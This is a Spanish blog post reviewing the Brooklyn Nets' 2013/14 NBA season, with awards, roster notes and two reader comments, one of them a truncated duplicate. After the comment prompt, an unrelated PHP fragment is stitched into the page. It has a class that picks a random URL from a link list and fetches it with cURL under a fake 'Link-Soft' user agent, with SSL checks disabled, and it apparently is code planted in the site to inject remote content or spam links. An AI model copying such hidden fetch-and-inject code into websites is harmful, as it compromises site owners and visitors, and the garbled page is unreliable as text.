Brooklyn Nets: Bien

04 de August de 2014 por TheDeerHunter

Campeones, nada menos. Leyendo ahora nuestro análisis de principio de curso más de uno podría pensar que sufríamos algún tipo de intoxicación etílica cuando lo escribimos. A nuestro favor hay que alegar que los Nets de la 2013/14 han sido uno de los mayores hypes de los últimos años, sólo comparables quizá al de Malone y Payton en los Lakers tricampeones de Shaq y Kobe. No fuimos los únicos impresionados por el músculo financiero que mostró el magnate ruso a la hora de confeccionar el equipo. Pierce, Garnett, Terry, Kirilenko, Blatche, Livingston… nombres ilustres y con algún que otro anillo en el currículum, fueron añadidos a los Deron, Brook, Deron, Johnson y un joven Mason Plumlee del que no esperábamos gran cosa. La casa por la ventana. Un plantillón de lujo al que, sobre el papel, había que dar necesariamente bastante crédito. Pero nunca es fácil armar un proyecto campeón por muchas montañas de dinero que puedas quemar. Se deben juntar varios factores para alcanzar el mayor de los éxitos y hemos visto fracasar bastantes más proyectos megalómanos que los que han triunfado. Mirándolo desde este punto de vista el balance final no es tan malo. En los primeros meses se rozó el más absoluto de los desastres pero a diferencia de otros no se hundieron y supieron sobreponerse y alcanzar la postemporada, en la que superaron la primera ronda. Si el objetivo era medirse a los Heat lo consiguieron, ganarles ya hubiera sido otro cantar. Conviene recordar que el factor lesiones también puede ser un atenuante y que no llegaron al momento decisivo en las mejores condiciones posibles ni con la artillería al completo. 

Lo que sí nos creaba bastantes dudas al principio de la temporada fue la elección de Jason Kidd para dirigir el barco. Nadie cuestionaba su conocimiento del juego ni su carácter ganador. Temimos por su inexperiencia, si sabría gestionar tantos egos y cómo podría afectar su condición de reciente ex jugador a la relación con sus pupilos. Ha salido bastante bien parado porque tras el peor comienzo imaginable supo soportar toda la presión del mundo mostrando personalidad para tomar decisiones complicadas. Logró controlar la ansiedad inicial y permitir al equipo crecer. Faltó tiempo y más suerte con las lesiones para terminar de enderezar la temporada. Su salida se debe a otras cuestiones.

En lo referido al rendimiento general de la plantilla ha habido luces y sombras, aunque por unos motivos u otros más de lo segundo que de lo primero. No muchos se han librado del impacto de las lesiones. Particularmente trágica la de Brook Lopez que se rompió tras únicamente 17 partidos cuando estaba siendo el mejor de largo. Rutilantes incorporaciones como Kevin Garnett, Andrei Kirilenko o Jason Terry también han padecido una campaña bastante negra, en parte, por los mismos motivos pero es lo que tiene apostar por jugadores veteranos y/o frágiles. Tanto imprevisto ha permitido recuperar para la causa a algunos hombres casi desahuciados. Shaun Livingston, Andray Blatche, Mirza Teletovic o Marcus Thornton han aprovechado la ocasión para revalorizarse significativamente. Además, Mason Plumlee ha logrado ganarse el sitio convirtiéndose en uno de los rookies más aprovechables del año. Con todo, los tres mejores y los más constantes han sido Deron Williams, Paul Pierce y Joe Johnson, éste último discutido all-star. Buen nivel pero tampoco para echar cohetes teniendo en cuenta su talento.

En definitiva, se apostó muy fuerte pero diríamos que era más bien para hacer ruido con el fin de atraer al personal al flamante Barklays Center de Brooklyn. Tengo mis dudas de que por allí alguien se creyera en serio eso de destronar a los Heat y la prueba podría ser la contratación de Kidd, aunque terminó saliendo relativamente bien. Ni siquiera creo que como equipo pudieran ser superiores a grupos cocinados a fuego lento durante años como Indiana o Chicago. Por lo tanto, me parece un objetivo razonable quedar entre los 4 mejores del Este y generar afición en la nueva sede. Mejor o peor ambos objetivos se han cumplido.

PREMIOS

MVP: Los 17 partidos que disputó Brook Lopez fueron impresionantes. Llevaba camino de all-star y de firmar el mejor año de su carrera. Curiosamente los resultados no acompañaron demasiado el momento. En cambio, el representante de los Nets en el partido de las estrellas fue Joe Johnson en una notable campaña. Máximo anotador y jugador más utilizado. En mi modesta opinión no mereció ser elegido entre los mejores de la liga y siempre transmite que, al menos durante la regular, lleva el freno de mano puesto.

Rookie: A pesar de que no dábamos un duro por él, notable campaña de Mason Plumlee, elegido en el quinteto ideal de rookies. Se trata de un jugador escasamente sobrado de talento, pero duro y cumplidor. Podrá enseñar a sus nietos el taponazo ganador a LeBron, en una de las mejores jugadas defensivas del curso.

Sorpresa: Jamás hubiéramos imaginado que Shaun Livingston, jugador residual desde su terrible lesión del 2007, fuera a ser titular indiscutible y hombre clave en este equipo. Casi podríamos decir que Kidd varió sus sistemas específicamente para incluirle y el jugador respondió. Extraño small ball el que plantearon pero eficaz.

Decepción: Duele ver a un jugador antológico como Kevin Garnett arrastrarse de esa forma por las pistas. Llegó a dar la impresión que a veces Kidd lo utilizaba por obligación. Tras protagonizar el peor año de su carrera con diferencia abismal y hubiéramos apostado a que se retiraría. Otro que parece más fuera que dentro de esta liga es Jason Terry. Andrei Kirilenko también ha sido noticia recientemente por rajar de su ex entrenador. Tras la temporada irrelevante que se ha marcado mejor debería quedarse calladito.

Esfuerzo en vano: Podemos imaginarnos todos los sapos que tuvo que tragarse Jason Kidd en la fase inicial de la temporada cuando todo parecía ir en su contra. Tuvo la fortuna de resistir y se vino arriba este verano pidiendo mucho más poder. También entendemos que la franquicia no quisiera transigir. La cuestión es que su salida como entrenador del equipo donde más le adoraron como jugador ha sido por la puerta de atrás y con poso de mal rollo. Una lástima.

JUGANDO A GM

Aplaudimos la decisión de fichar a Lionel Hollins para llevar las riendas de la franquicia. Un entrenador que nos gusta mucho.

A partir de ahí los Nets han sufrido cierta “fuga de talentos” con la salida de hombres importantes la temporada pasada como Pierce, Livingston y Blatche, para recibir a cambio a Jarrett Jack, Sergey Karasev y Bojan Bogdanovic más los dos segundas rondas Markel Brown y Cory Jefferson. Se trata de una pérdida de nivel evidente pero con la situación salarial en la que se encuentran no podían hacer mucho para evitarlo. En este sentido puede entenderse la renovación de Alan Anderson, tras un año excesivamente gris.

La plantilla del curso que viene está, sobre el papel, razonablemente bien armada para alcanzar playoffs y quizá pasar alguna ronda:

PG: Deron Williams, Jarrett Jack, Marquis Teague, Jorge Gutierrez
SG: Joe Johnson, Alan Anderson, Markel Brown
SF: Andrei Kirilenko, Bojan Bogdanovic, Sergey Karasev
PF: Kevin Garnett, Mirza Teletovic, Cory Jefferson
C: Brook Lopez, Mason Plumlee

Comenta

2 comentarios a esta entrada

  1. Esteban dice:
    #1

    si calificacion esta bien por que la NBA es un torneo muy largo, con todo lo que paso en el medio de la temporada, las lesiones y un arran

      Citar

  2. Esteban dice:
    #2

    si calificacion esta bien por que la NBA es un torneo muy largo, con todo lo que paso en el medio de la temporada, las lesiones y un arranque pesimo, un Kidd que parecia que no podia manejar al equipo, las expectativas de campeon, pasaron a ser las de llegar a PO como sea, y un gran logro una segunda ronda

    con las expectativas iniciales, pesimo, como se dio la historia, es un aceptable campeonato

    hemos llegado eso si a varias conclusiones, todas ellas negativas:

    el final de la carrera de Garnett, unos PO muy flojos, una pena pero ya no parece poder aportar ni en defensa

    El final de la era ganadora de Pierce? si bien los wizards son un buen equipo, otro titulo para “la verdad” parece imposible

    el final de la carrera NBA de Kirilenko, uno de los mejores jugadores europeos que se recuerden esta dando sus ultimos pasos en la liga, y a un discretisimo nivel

    el adios definitivo a la ilusion deron williams? quien fuera una verdadera estrella de la liga, hace 4 años que no rinde de la manera esperada, y en este no puede acusar a las lesiones, hay alguna ilusion de que vuelva a ser?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>